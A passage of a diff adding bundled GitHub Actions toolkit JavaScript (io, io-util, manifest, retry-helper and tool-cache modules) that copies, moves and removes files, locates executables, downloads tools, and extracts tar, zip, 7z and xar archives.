the actual file (since an extension was appended) + try { + const directory = path.dirname(filePath); + const upperName = path.basename(filePath).toUpperCase(); + for (const actualName of yield exports.readdir(directory)) { + if (upperName === actualName.toUpperCase()) { + filePath = path.join(directory, actualName); + break; + } + } + } + catch (err) { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); + } + return filePath; + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + } + return ''; + }); +} +exports.tryGetExecutablePath = tryGetExecutablePath; +function normalizeSeparators(p) { + p = p || ''; + if (exports.IS_WINDOWS) { + // convert slashes on Windows + p = p.replace(/\//g, '\\'); + // remove redundant slashes + return p.replace(/\\\\+/g, '\\'); + } + // remove redundant slashes + return p.replace(/\/\/+/g, '/'); +} +// on Mac/Linux, test the execute bit +// R W X R W X R W X +// 256 128 64 32 16 8 4 2 1 +function isUnixExecutable(stats) { + return ((stats.mode & 1) > 0 || + ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || + ((stats.mode & 64) > 0 && stats.uid === process.getuid())); +} +// Get the path of cmd.exe in windows +function getCmdPath() { + var _a; + return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; +} +exports.getCmdPath = getCmdPath; +//# sourceMappingURL=io-util.js.map + +/***/ }), + +/***/ 7436: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; +const assert_1 = __nccwpck_require__(9491); +const path = __importStar(__nccwpck_require__(1017)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +/** + * Copies a file or folder. + * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js + * + * @param source source path + * @param dest destination path + * @param options optional. See CopyOptions. + */ +function cp(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + const { force, recursive, copySourceDirectory } = readCopyOptions(options); + const destStat = (yield ioUtil.exists(dest)) ? 
yield ioUtil.stat(dest) : null; + // Dest is an existing file, but not forcing + if (destStat && destStat.isFile() && !force) { + return; + } + // If dest is an existing directory, should copy inside. + const newDest = destStat && destStat.isDirectory() && copySourceDirectory + ? path.join(dest, path.basename(source)) + : dest; + if (!(yield ioUtil.exists(source))) { + throw new Error(`no such file or directory: ${source}`); + } + const sourceStat = yield ioUtil.stat(source); + if (sourceStat.isDirectory()) { + if (!recursive) { + throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); + } + else { + yield cpDirRecursive(source, newDest, 0, force); + } + } + else { + if (path.relative(source, newDest) === '') { + // a file cannot be copied to itself + throw new Error(`'${newDest}' and '${source}' are the same file`); + } + yield copyFile(source, newDest, force); + } + }); +} +exports.cp = cp; +/** + * Moves a path. + * + * @param source source path + * @param dest destination path + * @param options optional. See MoveOptions. 
+ */ +function mv(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + if (yield ioUtil.exists(dest)) { + let destExists = true; + if (yield ioUtil.isDirectory(dest)) { + // If dest is directory copy src into dest + dest = path.join(dest, path.basename(source)); + destExists = yield ioUtil.exists(dest); + } + if (destExists) { + if (options.force == null || options.force) { + yield rmRF(dest); + } + else { + throw new Error('Destination already exists'); + } + } + } + yield mkdirP(path.dirname(dest)); + yield ioUtil.rename(source, dest); + }); +} +exports.mv = mv; +/** + * Remove a path recursively with force + * + * @param inputPath path to remove + */ +function rmRF(inputPath) { + return __awaiter(this, void 0, void 0, function* () { + if (ioUtil.IS_WINDOWS) { + // Check for invalid characters + // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file + if (/[*"<>|]/.test(inputPath)) { + throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); + } + } + try { + // note if path does not exist, error is silent + yield ioUtil.rm(inputPath, { + force: true, + maxRetries: 3, + recursive: true, + retryDelay: 300 + }); + } + catch (err) { + throw new Error(`File was unable to be removed ${err}`); + } + }); +} +exports.rmRF = rmRF; +/** + * Make a directory. Creates the full path with folders in between + * Will throw if it fails + * + * @param fsPath path to create + * @returns Promise + */ +function mkdirP(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(fsPath, 'a path argument must be provided'); + yield ioUtil.mkdir(fsPath, { recursive: true }); + }); +} +exports.mkdirP = mkdirP; +/** + * Returns path of a tool had the tool actually been invoked. Resolves via paths. + * If you check and the tool does not exist, it will throw. 
+ * + * @param tool name of the tool + * @param check whether to check if tool exists + * @returns Promise path to tool + */ +function which(tool, check) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // recursive when check=true + if (check) { + const result = yield which(tool, false); + if (!result) { + if (ioUtil.IS_WINDOWS) { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); + } + else { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); + } + } + return result; + } + const matches = yield findInPath(tool); + if (matches && matches.length > 0) { + return matches[0]; + } + return ''; + }); +} +exports.which = which; +/** + * Returns a list of all occurrences of the given tool on the system path. + * + * @returns Promise the paths of the tool + */ +function findInPath(tool) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // build the list of extensions to try + const extensions = []; + if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { + for (const extension of process.env['PATHEXT'].split(path.delimiter)) { + if (extension) { + extensions.push(extension); + } + } + } + // if it's rooted, return it if exists. otherwise return empty. 
+ if (ioUtil.isRooted(tool)) { + const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); + if (filePath) { + return [filePath]; + } + return []; + } + // if any path separators, return empty + if (tool.includes(path.sep)) { + return []; + } + // build the list of directories + // + // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, + // it feels like we should not do this. Checking the current directory seems like more of a use + // case of a shell, and the which() function exposed by the toolkit should strive for consistency + // across platforms. + const directories = []; + if (process.env.PATH) { + for (const p of process.env.PATH.split(path.delimiter)) { + if (p) { + directories.push(p); + } + } + } + // find all matches + const matches = []; + for (const directory of directories) { + const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); + if (filePath) { + matches.push(filePath); + } + } + return matches; + }); +} +exports.findInPath = findInPath; +function readCopyOptions(options) { + const force = options.force == null ? true : options.force; + const recursive = Boolean(options.recursive); + const copySourceDirectory = options.copySourceDirectory == null + ? 
true + : Boolean(options.copySourceDirectory); + return { force, recursive, copySourceDirectory }; +} +function cpDirRecursive(sourceDir, destDir, currentDepth, force) { + return __awaiter(this, void 0, void 0, function* () { + // Ensure there is not a run away recursive copy + if (currentDepth >= 255) + return; + currentDepth++; + yield mkdirP(destDir); + const files = yield ioUtil.readdir(sourceDir); + for (const fileName of files) { + const srcFile = `${sourceDir}/${fileName}`; + const destFile = `${destDir}/${fileName}`; + const srcFileStat = yield ioUtil.lstat(srcFile); + if (srcFileStat.isDirectory()) { + // Recurse + yield cpDirRecursive(srcFile, destFile, currentDepth, force); + } + else { + yield copyFile(srcFile, destFile, force); + } + } + // Change the mode for the newly created directory + yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); + }); +} +// Buffered file copy +function copyFile(srcFile, destFile, force) { + return __awaiter(this, void 0, void 0, function* () { + if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { + // unlink/re-link it + try { + yield ioUtil.lstat(destFile); + yield ioUtil.unlink(destFile); + } + catch (e) { + // Try to override file permission + if (e.code === 'EPERM') { + yield ioUtil.chmod(destFile, '0666'); + yield ioUtil.unlink(destFile); + } + // other errors = it doesn't exist, no work to do + } + // Copy over symlink + const symlinkFull = yield ioUtil.readlink(srcFile); + yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); + } + else if (!(yield ioUtil.exists(destFile)) || force) { + yield ioUtil.copyFile(srcFile, destFile); + } + }); +} +//# sourceMappingURL=io.js.map + +/***/ }), + +/***/ 2473: +/***/ (function(module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; +const semver = __importStar(__nccwpck_require__(5911)); +const core_1 = __nccwpck_require__(2186); +// needs to be require for core node modules to be mocked +/* eslint @typescript-eslint/no-require-imports: 0 */ +const os = __nccwpck_require__(2037); +const cp = __nccwpck_require__(2081); +const fs = __nccwpck_require__(7147); +function _findMatch(versionSpec, stable, candidates, archFilter) { + return __awaiter(this, void 0, void 0, function* () { + const platFilter = os.platform(); + let result; + let match; + let file; + for (const candidate of candidates) { + const version = candidate.version; + core_1.debug(`check ${version} satisfies ${versionSpec}`); + if (semver.satisfies(version, versionSpec) && + (!stable || candidate.stable === stable)) { + file = candidate.files.find(item => { + core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); + let chk = item.arch === archFilter && item.platform === platFilter; + if (chk && item.platform_version) { + const osVersion = module.exports._getOsVersion(); + if (osVersion === item.platform_version) { + chk = true; + } + else { + chk = semver.satisfies(osVersion, item.platform_version); + } + } + return chk; + }); + if (file) { + core_1.debug(`matched ${candidate.version}`); + match = candidate; + break; + } + } + } + if (match && file) { + // clone since we're mutating the file list to be only the file that matches + result = Object.assign({}, match); + result.files = [file]; + } + return result; + }); +} +exports._findMatch = _findMatch; +function _getOsVersion() { + // TODO: add windows and other linux, arm variants + // right now filtering on version is only an ubuntu and macos scenario 
for tools we build for hosted (python) + const plat = os.platform(); + let version = ''; + if (plat === 'darwin') { + version = cp.execSync('sw_vers -productVersion').toString(); + } + else if (plat === 'linux') { + // lsb_release process not in some containers, readfile + // Run cat /etc/lsb-release + // DISTRIB_ID=Ubuntu + // DISTRIB_RELEASE=18.04 + // DISTRIB_CODENAME=bionic + // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" + const lsbContents = module.exports._readLinuxVersionFile(); + if (lsbContents) { + const lines = lsbContents.split('\n'); + for (const line of lines) { + const parts = line.split('='); + if (parts.length === 2 && + (parts[0].trim() === 'VERSION_ID' || + parts[0].trim() === 'DISTRIB_RELEASE')) { + version = parts[1] + .trim() + .replace(/^"/, '') + .replace(/"$/, ''); + break; + } + } + } + } + return version; +} +exports._getOsVersion = _getOsVersion; +function _readLinuxVersionFile() { + const lsbReleaseFile = '/etc/lsb-release'; + const osReleaseFile = '/etc/os-release'; + let contents = ''; + if (fs.existsSync(lsbReleaseFile)) { + contents = fs.readFileSync(lsbReleaseFile).toString(); + } + else if (fs.existsSync(osReleaseFile)) { + contents = fs.readFileSync(osReleaseFile).toString(); + } + return contents; +} +exports._readLinuxVersionFile = _readLinuxVersionFile; +//# sourceMappingURL=manifest.js.map + +/***/ }), + +/***/ 8279: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.RetryHelper = void 0; +const core = __importStar(__nccwpck_require__(2186)); +/** + * Internal class for retries + */ +class RetryHelper { + constructor(maxAttempts, minSeconds, maxSeconds) { + if (maxAttempts < 1) { + throw new Error('max attempts should be greater than or equal to 1'); + } + this.maxAttempts = maxAttempts; + this.minSeconds = Math.floor(minSeconds); + this.maxSeconds = Math.floor(maxSeconds); + if (this.minSeconds > this.maxSeconds) { + throw new Error('min seconds should be less than or equal to max seconds'); + } + } + execute(action, isRetryable) { + return __awaiter(this, void 0, void 0, function* () { + let attempt = 1; + while (attempt < this.maxAttempts) { + // Try + try { + return yield action(); + } + catch (err) { + if (isRetryable && !isRetryable(err)) { + throw err; + } + 
core.info(err.message); + } + // Sleep + const seconds = this.getSleepAmount(); + core.info(`Waiting ${seconds} seconds before trying again`); + yield this.sleep(seconds); + attempt++; + } + // Last attempt + return yield action(); + }); + } + getSleepAmount() { + return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + + this.minSeconds); + } + sleep(seconds) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise(resolve => setTimeout(resolve, seconds * 1000)); + }); + } +} +exports.RetryHelper = RetryHelper; +//# sourceMappingURL=retry-helper.js.map + +/***/ }), + +/***/ 7784: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var __importDefault = (this && this.__importDefault) || function (mod) { + return (mod && mod.__esModule) ? mod : { "default": mod }; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; +const core = __importStar(__nccwpck_require__(2186)); +const io = __importStar(__nccwpck_require__(7436)); +const fs = __importStar(__nccwpck_require__(7147)); +const mm = __importStar(__nccwpck_require__(2473)); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const httpm = __importStar(__nccwpck_require__(6255)); +const semver = __importStar(__nccwpck_require__(5911)); +const stream = __importStar(__nccwpck_require__(2781)); +const util = __importStar(__nccwpck_require__(3837)); +const assert_1 = __nccwpck_require__(9491); +const v4_1 = __importDefault(__nccwpck_require__(7468)); +const exec_1 = __nccwpck_require__(1514); +const retry_helper_1 = __nccwpck_require__(8279); +class HTTPError extends Error { + constructor(httpStatusCode) { + super(`Unexpected HTTP response: ${httpStatusCode}`); + this.httpStatusCode = httpStatusCode; + Object.setPrototypeOf(this, new.target.prototype); + 
} +} +exports.HTTPError = HTTPError; +const IS_WINDOWS = process.platform === 'win32'; +const IS_MAC = process.platform === 'darwin'; +const userAgent = 'actions/tool-cache'; +/** + * Download a tool from an url and stream it into a file + * + * @param url url of tool to download + * @param dest path to download tool + * @param auth authorization header + * @param headers other headers + * @returns path to downloaded tool + */ +function downloadTool(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + dest = dest || path.join(_getTempDirectory(), v4_1.default()); + yield io.mkdirP(path.dirname(dest)); + core.debug(`Downloading ${url}`); + core.debug(`Destination ${dest}`); + const maxAttempts = 3; + const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); + const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); + const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); + return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { + return yield downloadToolAttempt(url, dest || '', auth, headers); + }), (err) => { + if (err instanceof HTTPError && err.httpStatusCode) { + // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests + if (err.httpStatusCode < 500 && + err.httpStatusCode !== 408 && + err.httpStatusCode !== 429) { + return false; + } + } + // Otherwise retry + return true; + }); + }); +} +exports.downloadTool = downloadTool; +function downloadToolAttempt(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (fs.existsSync(dest)) { + throw new Error(`Destination file path ${dest} already exists`); + } + // Get the response headers + const http = new httpm.HttpClient(userAgent, [], { + allowRetries: false + }); + if (auth) { + core.debug('set auth'); + if (headers === undefined) { + headers = {}; + } + headers.authorization = auth; + } + const response = yield 
http.get(url, headers); + if (response.message.statusCode !== 200) { + const err = new HTTPError(response.message.statusCode); + core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); + throw err; + } + // Download the response body + const pipeline = util.promisify(stream.pipeline); + const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); + const readStream = responseMessageFactory(); + let succeeded = false; + try { + yield pipeline(readStream, fs.createWriteStream(dest)); + core.debug('download complete'); + succeeded = true; + return dest; + } + finally { + // Error, delete dest before retry + if (!succeeded) { + core.debug('download failed'); + try { + yield io.rmRF(dest); + } + catch (err) { + core.debug(`Failed to delete '${dest}'. ${err.message}`); + } + } + } + }); +} +/** + * Extract a .7z file + * + * @param file path to the .7z file + * @param dest destination directory. Optional. + * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this + * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will + * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is + * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line + * interface, it is smaller than the full command line interface, and it does support long paths. At the + * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. + * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path + * to 7zr.exe can be pass to this function. 
+ * @returns path to the destination directory + */ +function extract7z(file, dest, _7zPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + const originalCwd = process.cwd(); + process.chdir(dest); + if (_7zPath) { + try { + const logLevel = core.isDebug() ? '-bb1' : '-bb0'; + const args = [ + 'x', + logLevel, + '-bd', + '-sccUTF-8', + file + ]; + const options = { + silent: true + }; + yield exec_1.exec(`"${_7zPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + else { + const escapedScript = path + .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') + .replace(/'/g, "''") + .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + command + ]; + const options = { + silent: true + }; + try { + const powershellPath = yield io.which('powershell', true); + yield exec_1.exec(`"${powershellPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + return dest; + }); +} +exports.extract7z = extract7z; +/** + * Extract a compressed tar archive + * + * @param file path to the tar + * @param dest destination directory. Optional. + * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. 
+ * @returns path to the destination directory + */ +function extractTar(file, dest, flags = 'xz') { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + // Create dest + dest = yield _createExtractFolder(dest); + // Determine whether GNU tar + core.debug('Checking tar --version'); + let versionOutput = ''; + yield exec_1.exec('tar --version', [], { + ignoreReturnCode: true, + silent: true, + listeners: { + stdout: (data) => (versionOutput += data.toString()), + stderr: (data) => (versionOutput += data.toString()) + } + }); + core.debug(versionOutput.trim()); + const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); + // Initialize args + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + if (core.isDebug() && !flags.includes('v')) { + args.push('-v'); + } + let destArg = dest; + let fileArg = file; + if (IS_WINDOWS && isGnuTar) { + args.push('--force-local'); + destArg = dest.replace(/\\/g, '/'); + // Technically only the dest needs to have `/` but for aesthetic consistency + // convert slashes in the file arg too. + fileArg = file.replace(/\\/g, '/'); + } + if (isGnuTar) { + // Suppress warnings when using GNU tar to extract archives created by BSD tar + args.push('--warning=no-unknown-keyword'); + args.push('--overwrite'); + } + args.push('-C', destArg, '-f', fileArg); + yield exec_1.exec(`tar`, args); + return dest; + }); +} +exports.extractTar = extractTar; +/** + * Extract a xar compatible archive + * + * @param file path to the archive + * @param dest destination directory. Optional. + * @param flags flags for the xar. Optional. 
+ * @returns path to the destination directory + */ +function extractXar(file, dest, flags = []) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + args.push('-x', '-C', dest, '-f', file); + if (core.isDebug()) { + args.push('-v'); + } + const xarPath = yield io.which('xar', true); + yield exec_1.exec(`"${xarPath}"`, _unique(args)); + return dest; + }); +} +exports.extractXar = extractXar; +/** + * Extract a zip + * + * @param file path to the zip + * @param dest destination directory. Optional. + * @returns path to the destination directory + */ +function extractZip(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + dest = yield _createExtractFolder(dest); + if (IS_WINDOWS) { + yield extractZipWin(file, dest); + } + else { + yield extractZipNix(file, dest); + } + return dest; + }); +} +exports.extractZip = extractZip; +function extractZipWin(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + // build the powershell command + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const pwshPath = yield io.which('pwsh', false); + //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory + //and the -Force flag for Expand-Archive as a fallback + if (pwshPath) { + //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive + const pwshCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, + `try { 
[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, + `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` + ].join(' '); + const args = [ + '-NoLogo', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + pwshCommand + ]; + core.debug(`Using pwsh at path: ${pwshPath}`); + yield exec_1.exec(`"${pwshPath}"`, args); + } + else { + const powershellCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, + `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, + `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` + ].join(' '); + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + powershellCommand + ]; + const powershellPath = yield io.which('powershell', true); + core.debug(`Using powershell at path: ${powershellPath}`); + yield exec_1.exec(`"${powershellPath}"`, args); + } + }); +} +function extractZipNix(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + const unzipPath = yield io.which('unzip', true); + const args = [file]; + if (!core.isDebug()) { + args.unshift('-q'); + } + args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run + yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); + }); +} +/** + * Caches a directory and installs it into the tool cacheDir + * + * @param sourceDir the directory to cache into tools + * @param tool tool 
name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheDir(sourceDir, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source dir: ${sourceDir}`); + if (!fs.statSync(sourceDir).isDirectory()) { + throw new Error('sourceDir is not a directory'); + } + // Create the tool dir + const destPath = yield _createToolPath(tool, version, arch); + // copy each child item. do not move. move can fail on Windows + // due to anti-virus software having an open handle on a file. + for (const itemName of fs.readdirSync(sourceDir)) { + const s = path.join(sourceDir, itemName); + yield io.cp(s, destPath, { recursive: true }); + } + // write .complete + _completeToolPath(tool, version, arch); + return destPath; + }); +} +exports.cacheDir = cacheDir; +/** + * Caches a downloaded file (GUID) and installs it + * into the tool cache with a given targetName + * + * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. + * @param targetFile the name of the file name in the tools directory + * @param tool tool name + * @param version version of the tool. semver format + * @param arch architecture of the tool. Optional. Defaults to machine architecture + */ +function cacheFile(sourceFile, targetFile, tool, version, arch) { + return __awaiter(this, void 0, void 0, function* () { + version = semver.clean(version) || version; + arch = arch || os.arch(); + core.debug(`Caching tool ${tool} ${version} ${arch}`); + core.debug(`source file: ${sourceFile}`); + if (!fs.statSync(sourceFile).isFile()) { + throw new Error('sourceFile is not a file'); + } + // create the tool dir + const destFolder = yield _createToolPath(tool, version, arch); + // copy instead of move. 
